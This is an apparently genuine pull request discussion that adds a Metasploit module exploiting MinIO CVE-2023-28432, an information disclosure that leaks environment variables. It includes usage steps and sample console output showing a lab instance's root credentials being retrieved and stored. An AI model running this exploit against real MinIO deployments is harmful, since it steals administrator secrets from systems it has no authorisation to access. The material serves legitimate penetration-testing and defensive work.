Adding new module for MinIO (CVE-2023-28432)

[6a6f656c]

This PR adds a new exploit for MinIO CVE-2023-28432.

MinIO is a Multi-Cloud Object Storage framework. In a cluster deployment starting with
RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns
all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD,
resulting in information disclosure.

Verification

• Start msfconsole
• Do: use auxiliary/gather/minio_bootstrap_verify_info_disc.rb
• Do: set rhost [IP]
• Do: run
• You should get MinIO Environmental Variables

[cdelafuente-r7]

Thanks @cudalac for this module. I left a few suggestions to improve for you to review. Also, I tested against the Docker installation and it works as expected.

[6a6f656c]

Resolved all issues

[cdelafuente-r7]

@msjenkins-r7 test this please

[cdelafuente-r7]

Thanks for updating this @6a6f656c ! Everything looks good to me now. I tested against the Docker installation and verified the MinIO Environmental Variables Json were retrieved as expected. I'll go ahead and land it.

• Example output:

msf6 auxiliary(gather/minio_bootstrap_verify_info_disc) > run rhosts=127.0.0.1 rport=9000 verbose=true
[*] Running module against 127.0.0.1

[*] Sending Request
[+] MINIO_ACCESS_KEY_FILE: access_key
[+] MINIO_CONFIG_ENV_FILE: config.env
[+] MINIO_KMS_SECRET_KEY_FILE: kms_master_key
[+] MINIO_ROOT_PASSWORD: minioadmin-vulhub
[+] MINIO_ROOT_PASSWORD_FILE: secret_key
[+] MINIO_ROOT_USER: minioadmin
[+] MINIO_ROOT_USER_FILE: access_key
[+] MINIO_SECRET_KEY_FILE: secret_key
[+] MinIO Environmental Variables Json Saved to: /home/msfuser/.msf4/loot/20240311134450_default_127.0.0.1_minio.env.json_031449.json
[*] Auxiliary module execution completed
msf6 auxiliary(gather/minio_bootstrap_verify_info_disc) > creds
Credentials
===========

host       origin     service           public      private            realm  private_type  JtR Format
----       ------     -------           ------      -------            -----  ------------  ----------
127.0.0.1  127.0.0.1  9000/tcp (MinIO)  minioadmin  minioadmin-vulhub         Password

[cdelafuente-r7]

Release Notes

This adds an auxiliary module that leverages an information disclosure (CVE-2023-28432) in a cluster deployment of MinIO versions from RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z. This retrieves all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD.